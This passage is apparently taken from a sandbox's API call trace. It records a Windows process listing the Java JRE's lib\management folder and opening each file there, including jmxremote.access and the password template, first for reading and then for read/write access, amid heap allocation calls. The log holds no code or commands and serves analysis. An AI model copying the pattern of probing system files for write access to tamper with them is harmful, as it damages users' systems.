cbMultiByte=-1, lpWideCharStr=0x45e18, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management") returned 50 [0097.540] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.540] GetLastError () returned 0x5 [0097.540] GetLastError () returned 0x5 [0097.540] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.540] GetLastError () returned 0x5 [0097.540] GetLastError () returned 0x5 [0097.540] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.540] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.540] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.540] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0097.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0097.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0097.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0097.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0097.540] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c76e77, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x17d, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="management-agent.jar", cAlternateFileName="MANAGE~1.JAR")) returned 1 [0097.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0097.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0097.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0097.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0097.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0097.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0097.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0097.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35250 [0097.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0097.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0097.541] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78010 [0097.542] FindNextFileW (in: hFindFile=0x78010, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa1389711, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0097.542] FindNextFileW (in: hFindFile=0x78010, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xf9e, dwReserved0=0x0, dwReserved1=0x0, cFileName="jmxremote.access", cAlternateFileName="JMXREM~1.ACC")) returned 1 [0097.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0097.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0097.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0097.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0097.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0097.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0097.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0097.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0097.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0097.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0097.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0097.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46518 [0097.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0097.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0097.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0097.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0097.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0097.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0097.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0097.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0097.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0097.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0097.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0097.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f9a8 [0097.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0097.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0097.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ab20 [0097.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f9a8 | out: hHeap=0x20000) returned 1 [0097.543] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.543] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.543] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.543] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0097.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.543] AreFileApisANSI () returned 1 [0097.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.access", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.access", lpUsedDefaultChar=0x0) returned 67 [0097.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0097.544] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.544] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0097.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0097.544] AreFileApisANSI () returned 1 [0097.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 67 [0097.544] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x86) returned 0x82ef8 [0097.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x82ef8, cchWideChar=67 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.access") returned 67 [0097.544] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.access" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management\\jmxremote.access"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0097.545] GetFileType (hFile=0x418) returned 0x1 [0097.545] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82ef8 | out: hHeap=0x20000) returned 1 [0097.545] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0097.545] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0097.545] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0097.545] CloseHandle (hObject=0x418) returned 1 [0097.545] AreFileApisANSI () returned 1 [0097.545] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 67 [0097.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x86) returned 0x82328 [0097.545] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x82328, cchWideChar=67 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.access") returned 67 [0097.546] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.access" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management\\jmxremote.access"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0097.546] GetFileType (hFile=0x418) returned 0x1 [0097.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82328 | out: hHeap=0x20000) returned 1 [0097.546] CloseHandle (hObject=0x418) returned 1 [0097.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0097.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0097.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0097.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0097.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0097.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0097.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0097.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0097.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0097.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0097.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0097.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0097.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0097.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0097.547] AreFileApisANSI () returned 1 [0097.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 67 [0097.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x86) returned 0x82058 [0097.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x82058, cchWideChar=67 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.access") returned 67 [0097.547] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.access" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management\\jmxremote.access"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xf9e)) returned 1 [0097.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82058 | out: hHeap=0x20000) returned 1 [0097.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0097.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0097.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0097.547] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.547] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.547] FindNextFileW (in: hFindFile=0x78010, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xb28, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="jmxremote.password.template", cAlternateFileName="JMXREM~1.TEM")) returned 1 [0097.547] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68ef0 [0097.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0097.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0097.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0097.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0097.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0097.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68ef0 | out: hHeap=0x20000) returned 1 [0097.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69170 [0097.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0097.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0097.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0097.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0097.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0097.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0097.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0097.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0097.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0097.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0097.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0097.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0097.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0097.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fd18 [0097.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0097.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0097.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d2c8 [0097.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fd18 | out: hHeap=0x20000) returned 1 [0097.548] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.548] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.548] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.548] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d2c8 | out: hHeap=0x20000) returned 1 [0097.548] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0097.548] AreFileApisANSI () returned 1 [0097.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.password.template", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.password.template", lpUsedDefaultChar=0x0) returned 78 [0097.548] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0097.549] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.549] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0097.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0097.549] AreFileApisANSI () returned 1 [0097.549] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0097.549] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x8d2c8 [0097.549] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, 